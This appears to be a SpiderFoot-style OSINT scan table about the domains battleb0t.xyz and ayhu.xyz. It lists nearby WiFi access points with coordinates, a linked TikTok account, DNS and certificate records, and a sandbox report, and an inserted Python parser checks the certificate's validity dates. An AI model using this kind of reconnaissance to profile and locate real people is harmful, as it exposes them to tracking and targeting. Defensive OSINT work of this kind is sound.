"{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NETGEAR48 (Net ID: B0:39:56:06:50:02) | 37.751, -97.822 |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000yesnt.github.io | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:EB:D7:15) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | TikTok (Category: social)
https://www.tiktok.com/@ayshoo?lang=en | ayshoo |
| 2023-05-12 02:56:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://reurl.cc/4xdkky', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.82.57.202:443"\n "54.231.160.113:443"\n "35.229.48.116:443"\n "104.16.123.175:443"\n "34.196.48.118:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/63363db12399455d8f5fde07946c0dd3?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /resources/63363db12399455d8f5fde07946c0dd3?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET 
/main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 
1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: 
https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 
(")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_f4c_IESQMMUTEX_0_519"\n "IsoScope_f4c_IESQMMUTEX_0_303"\n "IsoScope_f4c_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f4c_IE_EarlyTabStart_0xcec_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f4c_ConnHashTable<3916>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3916"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f4c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"lor.instructure.com"'}, 
{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'id | 35.229.48.116 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.198): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom2888 (Net ID: 00:01:38:85:BD:9E) | 37.780462,-122.390564 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:45:9F:3A) | 34.0544, -118.244 |
| 2023-05-12 03:00:52 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.81): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | lcgteach (Net ID: 00:0B:86:22:0F:30) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:6A:57:0B) | 34.0544, -118.244 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Apple Network 3668a9 (Net ID: 00:02:2D:00:C6:8F) | 37.780462,-122.390564 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | CN=donation.ecash-pay.com | 165.232.113.85 |
| 2023-05-12 03:03:18 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
56:a7:32:cc:63:2f:7b:45:7f:05:18:5f:3e:03:67:82:e5:0e:
14:24:2d:4e:bd:24:f5:fa:90:92:69:17:7b:d1:23:b4:5f:72:
7a:af:32:e2:c8:28:7e:98:41:f2:c7:ab:41:34:02:6f:ca:a4:
77:0e:6b:df:35:1b:69:e8:30:42:43:a2:b1:d9:fd:cb:17:1e:
46:a3:67:c9:5d:ff:94:85:0e:a2:df:d3:83:d0:a3:f2:83:7b:
dd:2e:d5:ae:32:94:05:46:0c:19:ca:ed:27:24:30:de:c1:83:
b3:fa:a9:28:10:06:41:f9:bc:8e:ec:2c:b2:c5:50:1b:53:d4:
5f:dc:93:4c:91:47:36:3e:18:bb:60:2e:2b:c3:a2:8e:d0:41:
bf:b5:f2:c1:3c:9e:23:83:f3:0a:e9:90:b8:ea:07:4c:7d:33:
7f:96:41:8c:3e:17:1d:9e:ed:d7:88:e1:f2:d6:4c:ee:67:b7:
9d:77:dd:54:17:a0:45:80:3c:14:ae:d9:2c:f9:2f:a7:d3:1a:
b6:ff:c0:51:b2:15:42:38:03:d0:4b:ff:c0:3f:6d:02:65:07:
67:bb:0a:98:60:da:ab:a9:72:b1:8d:b2:e0:ad:99:f8:08:b9:
1a:39:e6:69:82:23:94:db:8e:23:77:72:cb:aa:45:70:fd:4e:
10:ce:72:06
|
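The row above stores the ayhu.xyz certificate as an `openssl x509 -text` style dump, and the "Internet Name - Unresolved: mail.ayhu.xyz" finding was derived from its Subject Alternative Name list. Two things a practitioner should check before pivoting on such a row: the certificate carries the CT Precertificate Poison extension, so it is a precertificate taken from Certificate Transparency logs and proves issuance, not that the host ever served it; and its Not After date (13 March 2023) is before the scan date, so the SAN hostnames are historical. The parser below is an added example, not part of the scan output or of SpiderFoot; the function names are mine, and its input is a trimmed copy of the certificate text from the row above (modulus and signature bytes omitted).

```python
"""Parse an `openssl x509 -text` style dump, which is how the certificate cells
in this scan table are stored, and pull out what an analyst pivots on: subject,
SAN hostnames, validity window and whether the record is a Certificate
Transparency precertificate rather than a served leaf."""
import re
from datetime import datetime, timezone

# Trimmed copy of the ayhu.xyz certificate text from the table row above.
# The modulus and signature bytes are omitted because nothing here needs them.
CERT_TEXT = """Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
CT Precertificate Poison: critical
NULL
"""

_OPENSSL_DATE = "%b %d %H:%M:%S %Y %Z"   # e.g. "Mar 13 18:07:06 2023 GMT"


def _parse_date(value):
    # openssl pads single-digit days with a space; collapse whitespace first
    return datetime.strptime(" ".join(value.split()), _OPENSSL_DATE).replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Return a dict of the fields worth keeping from the text dump."""
    lines = [ln.strip() for ln in text.splitlines()]
    info = {"subject": None, "issuer": None, "serial": None,
            "not_before": None, "not_after": None, "sans": [], "precert": False}
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if line.startswith("Subject:"):
            info["subject"] = line.split(":", 1)[1].strip()
        elif line.startswith("Issuer:"):
            info["issuer"] = line.split(":", 1)[1].strip()
        elif line == "Serial Number:":
            info["serial"] = nxt.replace(":", "")
        elif line.startswith("Not Before:"):
            info["not_before"] = _parse_date(line.split(":", 1)[1])
        elif line.startswith("Not After"):
            info["not_after"] = _parse_date(line.split(":", 1)[1])
        elif line.startswith("X509v3 Subject Alternative Name"):
            info["sans"] = re.findall(r"DNS:([^,\s]+)", nxt)
        elif line.startswith("CT Precertificate Poison"):
            # Precerts come from CT logs (crt.sh and friends), not from a TLS
            # handshake with the host, so they prove issuance, not deployment.
            info["precert"] = True
    return info


def valid_at(info, when_utc):
    """True if the certificate was inside its validity window at `when_utc`,
    given as 'YYYY-MM-DD HH:MM:SS' (the format of the Date Found column)."""
    when = datetime.strptime(when_utc, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return info["not_before"] <= when <= info["not_after"]


if __name__ == "__main__":
    cert = parse_cert_text(CERT_TEXT)
    print(cert["subject"], cert["sans"], "precert" if cert["precert"] else "leaf")
    print("valid at scan time:", valid_at(cert, "2023-05-12 03:03:18"))
```

Run against the row's own scan timestamp, `valid_at` returns False: the SAN names are worth keeping as historical hostnames, but nothing in this row shows that ayhu.xyz or mail.ayhu.xyz was serving TLS with this certificate at scan time.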
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Fly By (Net ID: 00:02:6F:5D:6C:20) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Bug and issue tracking software | battleb0t.github.io |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5bc4bf4f0229c3-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c594cb34339')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="fXRp0MT2Gq_7yIcIgnBHmz4mvl642t3xYxkCV5CopVU-1683861861-0-AevD5zHzR5Nylhg7VMHylWA-UGhfY5JI7t_DZKLajlY04sfvOKhEUvL9GVGicMZplZkcd7EKnpXCooBz_psnEdyw4NmTFN3sNXxO3b2NuDlfX3fgFqIYYwxN-_ZcrgInEcSdq4ze85lgbNjmAyI7cICej2859mTsNPJTSg3Eei4MCiIEepygARCAmXkyjazT_siRWXRbIF3Yq9cQrkKvTYHjy7kA4ARUBhj3gHLsfY6ByHmcA-4oH5F_BMaNFfn83ZbE-O4HF1luYDVMX4jN2SY5BFBmGirV5lQE7nc2ET_G_HywU7GlMXbT0JmkojLsvRDxpqP_ZBtz_vJHbi4FUOHHRaxbF6WI1ct7U2kIlltKjNHrBNnSQ1zRICZ4xPEiXCRFEqv1mvMk_vuWumbRs70YeoiNBWGJjw9SNPC0qRv0_rQzWEhzAZCr9GR45Pyn22x2UzlVIl478oJoBXIxbm7A_QBYYHzFjMNgE8pR4rE43z-LkzbfZp4Mrz4ipAVKmZJGkf2Y5B_9TlYOJXKMjDFy4LD0ELxkw1-R_QW_mLtVmznveG5c9m2IZ2zQV1cn4H8j5Bc1iY811MUNVsmFG0JD-DYsguU4LRfDkaOmbWCSaJ34wnyswYZY6vuAq7jQcIjqzclxyNRihA5I_cL6ueo4Ri5oVSncrTfIsWIYMESFPA-cZy_mtxt3SdM8IrciE1x1sYi06n9I6prGHl0s-4QNR7JVOnbdMoI28ES-j7HwNWZk4MsUxFuzUOsk5lSLsSRh-hQZxr19nktp-MvVpSzRUuSL26nuxNFkN8FTk5Ae96R-Z683yfnj1pOwmIp-ezEp2JWb8TkZZ0zoMJBnNWz-dER92U4KjRMwAWRs684SongNmPEIXYAgqclvfJ3msrReLNbVn2C0cz7wvPKboCqEwy5ipFMXgNiuhbJpqavDTbOw2pcmk4nLwQO7-0fq6lR-AioIh72_7f-dcCDyp3CvaV2lSxONdGbwSj69Uzxdx9pjqKiA7eKWgpDp1A1TT4OM1UPvdKoDNlfXS-kt53TGtcDj_tr5ZSCxVfBj5Eaq6vy-dzTe3un5fL0Jw93IdI7hmq3BtVNMvvG3ttwva1yDFbKbbzAoei-_xuiypX7ONnqllk5lT1u_-s9W-YqxnvXblOasj5xt36xai8HGELg30c69mi7dS6KFtoe8onnoqh_Jv5x6H6CEBPpBlJkQ-7Wml_gwi2q6d0tQ_ZdaaMoOXxHsxIyK5qGvyrxIKQoaob4JTcbfXfzc5V6fJoXtr9RSoGgPAroX9StxeMfnAcZJZ38lwB2R_OkZXBx7EFcRTvZsqwNSAcBE597i5gxzUV9OIg9fnTaoLIGC6pMfXSOrCdhVP4gGEX4Bccu5X10qZzo6Szn5JgpstSZeqAMVuU9TWGPYdK5uOwlHRiWmjX7UntfXmsGqJLQN_MyyArtIqHW_GuUvvub4g6fNvemcAOPIu9NS3HWmMTmUN4ACMa423i12vOJGRP7TcmceYbGSntTQh51WDUHuY7LdwoWtDpwMlk9-stOh87SR4LOrDyvW1iZRowgiTy2GmxHJlIHKCRhXnA5KaH4pnPJkKkhrPoRN6DTCQDr15qpBgZxUmF4wezI7yU8i7hxFvjA2vpTMuEjzuFK5Xab8ZS1nR5YLbQiKD3ROG0S6bl-4nxyf66OU-8Xv4FaugupxS3e-wlAwiX3hxmLNdGdmQn9eyC4_2RwUK2WWp5b7e4SAi9-pAVBzMefue3T2KHTLHF643icuFWjUauohcHM9aP5V8YQkXvauXJeiafKXSGCb142muLvzgJ9tWui0nHCx7aGYnZ5KCXJJAPsMf9OR8piOc-bOw90DQdaaAoQce9uq1wQGOtC7qhcYnC54DqDoEYzADwA9eHH9C
